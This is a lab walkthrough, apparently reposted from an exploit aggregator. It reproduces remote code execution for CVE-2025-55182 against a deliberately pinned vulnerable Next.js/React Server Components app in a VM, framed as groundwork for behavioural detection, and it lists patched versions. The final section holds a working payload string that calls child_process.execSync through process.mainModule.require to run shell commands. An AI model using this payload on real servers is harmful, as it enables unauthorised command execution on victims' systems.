Share
## https://sploitus.com/exploit?id=C765384D-0A5B-5B19-8FF0-8B4BA9DD609E
# CVE-2025-55182 Demonstration Lab (Next.js / React RSC RCE)

This document provides a complete and reproducible setup for demonstrating CVE-2025-55182 Remote Code Execution (RCE) against a vulnerable Next.js + React Server Components environment running inside a Multipass Ubuntu VM.

The exploit is executed **from outside the VM**, proving remote exploitability and preparing the environment for anomalous behavioral detection.

Source: https://github.com/ejpir/CVE-2025-55182-research

---

## 1. Create and Prepare the Ubuntu VM

## 2. Basic Setup Inside the VM

### 2.1 Update system and install dependencies

```bash
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential
```

### 2.2 Install Node.js LTS (20.x)

```bash
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs
```

Verify:

```bash
node -v
npm -v
```

### 2.3 Create a dedicated user for the app

```bash
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab
```

---

## 3. Deploy the Vulnerable Next.js App

### 3.1 Create working directory

```bash
mkdir ~/react2shell-lab
cd ~/react2shell-lab
```

### 3.2 Generate a barebones Next.js App Router project

```bash
npx create-next-app@latest vulnerable-app
cd vulnerable-app
```

### 3.3 Pin vulnerable versions in `package.json`

Edit dependencies:

```json
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}
```

Reinstall packages:

```bash
rm -rf node_modules package-lock.json
npm install
```

Verify:

```bash
npm list react react-dom next
```

Expected:

```
react@19.1.0
react-dom@19.1.0
next@16.0.0
```

### 3.4 Build and run in production mode

```bash
npm run build
npm start
```

Expected output:

```
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000
```

![start](images/start.png)

---

## 4. Confirm External Accessibility (Attacker Machine → VM)

On another machine:

```bash
curl http://10.102.169.126:3000
```

You should receive the default Next.js HTML page.

---

## 5. Clone and Test the PoC on the Attacker Machine

### 5.1 Clone repository

```bash
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research
```

### 5.2 Point PoC to the server IP

Find:

```js
hostname: 'localhost',
```

Replace with:

```js
hostname: '10.X.X.X',
```

### 5.3 Run baseline PoC (simple console.log RCE)

With Next still running:

```bash
node test-simple.cjs
```

Expected in the Next.js terminal:

```
NON-CHUNKED-RCE
```

This confirms **remote code execution via React Flight** using the vulnerable versions.

![confirmed](images/non-chunked-rce.png)

---

## 6. Modify the PoC to Perform a Visible Side‑Effect (File Creation)

The goal is to generate observable behavior (filesystem + process execution).

### 6.1 Edit `_prefix` inside `test-simple.cjs`

Locate:

```js
"_prefix": "console.log('NON-CHUNKED-RCE');//"
```

Replace with:

```js
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"
```

Note: `require` is not available in the execution context, but `process.mainModule.require()` is.

### 6.2 Test modified exploit 

Ensure Next is running, then:

```bash
node test-simple.cjs
```

Check file creation:

```bash
ls -l /tmp/
```

You should see:

```
cve-2025-55182-syscall
```

This confirms functional RCE with side effects.

![start](images/exploited.png)

---

Patch:  
React ≥ 19.2.1  
Next.js ≥ 16.0.7